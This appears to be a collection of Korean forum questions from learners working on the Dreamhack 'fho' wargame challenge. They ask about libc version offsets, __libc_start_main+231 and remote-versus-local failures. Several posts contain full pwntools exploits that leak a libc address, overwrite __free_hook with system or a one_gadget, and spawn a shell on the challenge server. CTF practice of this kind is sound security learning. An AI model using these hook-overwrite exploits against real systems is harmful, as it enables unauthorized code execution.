libc 버전이 바뀌었을 때 다시 확인해야 하는 값들이 몇몇 있던데, 디버깅 하게되면 사용자 컴퓨터의 libc 기준으로 하는거 같아서 해결법이 있는지 궁금합니다 ㅠㅠ

libc의 버전또한 알아내는 것이 문제의 의도인지 궁금합니다 :) 또는 libc 정보 없이도 해결이 가능한가요?

아래는 작성 한 익스플로잇 코드와 실행 결과입니다. 코드는 잘 작성한 거 같은데 이상하게도 실행만 하면 도중에 쉘이 끊기네요..... 어떤 부분이 문제일까요.....? 1 #!/usr/bin/python3 2 3 from pwn import * 4 5 p = remote("host3.dreamhack.games", 11357) 6 e = ELF("./fho") 7 lib = ELF("./libc-2.27.so") 8 9 payload = b"A"*0x48 10 p.sendafter("Buf: ", payload) 11 p.recvuntil(payload) 12 libc_start_main = u64(p.recvn(6) + b"\x00" * 2) 13 14 libc_base = libc_start_main - (lib.symbols["__libc_start_main"] - 243) 15 system = libc_base + lib.symbols["system"] 16 free_hook = libc_base + lib.symbols["__free_hook"] 17 binsh = libc_base + next(lib.search(b"/bin/sh")) 18 19 print(hex(libc_base)) 20 print(hex(system)) 21 print(hex(free_hook)) 22 print(hex(binsh)) 23 24 p.sendlineafter("To write: ", str(free_hook)) 25 p.sendlineafter("With: ", str(system)) 26 p.sendlineafter("To free: ", str(binsh)) 27 28 p.interactive()

지금은 문제에서 libc 파일이 주어져 이를 통해 버전을 알아낼 수 있었고 도커를 굳이 쓸 필요 없었는데, 도커 파일은 이런 파일을 주지 않는 경우에 쓰는 건가요?

gdb에서 확인해 보면 libc_start_main+231 로 보이는것은 알겠습니다. 어느 시스템이나 모두 231은 동일한 것인가요?

exploit test를 통해서 Hook overwrite를 따라해보고 있습니다. local에서 flag 값까지 얻었는데 실제 서버에서는 flag값이 안나오네요. 뭐가 문제인지 알 수 있을까요? code #!/usr/bin/python3 from pwn import * p = remote("host1.dreamhack.games", 17917) #p = process("./fho") e = ELF("./fho") libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so") def slog(name, addr): return success(": ".join([name, hex(addr)])) buf = b"A"*0x48 p.sendafter("Buf: ", buf) p.recvuntil(buf) libc_start_main_xx = u64(p.recvline()[:-1]+b"\x00"*2) libc_base = libc_start_main_xx - 0x021b97 free_hook = libc_base + libc.symbols["_free_hook"] og = libc_base+0x4f302 slog("libc_base", libc_base) slog("free_hook", free_hook) p.recvuntil("To write: ") p.sendline(str(free_hook)) p.recvuntil("With: ") p.sendline(str(og)) p.recvuntil("To free: ") p.sendline(str(0x31337)) # doesn't matter p.interactive() server 응답 hyunmin@WMRRD11-NC102M3:~/hyunmin$ python result.py [+] Opening connection to host1.dreamhack.games on port 17917: Done [*] '/home/hyunmin/hyunmin/fho' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled [*] '/lib/x86_64-linux-gnu/libc-2.27.so' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled [+] libc_base: 0x7f4ec0479060 [+] free_hook: 0x7f4ec0866948 [*] Switching to interactive mode [*] Got EOF while reading in interactive $ ls

libc.symbols['__libc_start_main'] + 231 이 부분이 이해가 되지 않습니다. fho 실행 파일 gdb에서 스택 찍어보면 ret에 찍혀 있는 주소값이 있고 해당 주소값을 확인해보면 __libc_start_main + 205라고 되어있는데요 왜 231이 답이되는걸까요?

도커 파일도 없는 상황에서는 찍는 방법밖에 없나요? 풀기는 했는데 로컬에서 실험하다 고생을 좀 해서...

[질문1] p.recvline()으로 받는 경우, 사진처럼 받아오는데요. 왜 맨 앞에 a(초록색 화살표)가 생기는지 궁금합니다. 그리고 recvline은 개행문자를 만날 때 까지 받아오는 것으로 알고 있는데, 개행문자가 순서상으로 파란색 \x00 까지 맞나요 ? 그리고 p.recvline()[:-1] 을 하는것이 개행문자 까지 받아온 후 개행문자를 제거한다고 이해되는데 맞을까요? [질문2] libc_start_main_xx = u64(p.recvline()[:-1] + b'\x00'*2) 만약, libc_start_main_xx = 0x7fe13e4d6c87 이라면.. 라이브러리 주소는 앞에 0000으로 시작하므로 직관적으로 보면, 아래 처럼 만들려면 0x00007fe13e4d6c87 1)번처럼 해야할 것 같은데 왜 2)처럼 해야할까요? 1) b'\x00'*2 + p.recvline()[:-1] 2) p.recvline()[:-1] + b'\x00'*2

ubuntu 18.04 docker 환경설정해서 local 에서는 정상적으로 동작하는 것을 확인했습니다. 그런데 remote 로 연결하면 flag 파일이 보이지 않는데, 제가 뭘 잘 못한 걸까요? local 실행 결과 root@9d8cef7e6f20:/home/fho# python fho.py [+] Starting local process './fho': pid 5869 [!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 2) [*] '/home/fho/fho' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled [!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 2) [*] '/lib/x86_64-linux-gnu/libc-2.27.so' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled [*] Switching to interactive mode $ ls fho fho.py fho2.py flag venv $ cat flag DH{flag} remote 실행결과 root@9d8cef7e6f20:/home/fho# python fho.py [+] Opening connection to host3.dreamhack.games on port 17073: Done [!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 2) [*] '/home/fho/fho' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled [!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 2) [*] '/lib/x86_64-linux-gnu/libc-2.27.so' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled [*] Switching to interactive mode [*] Got EOF while reading in interactive $ ls $ cat flag $ `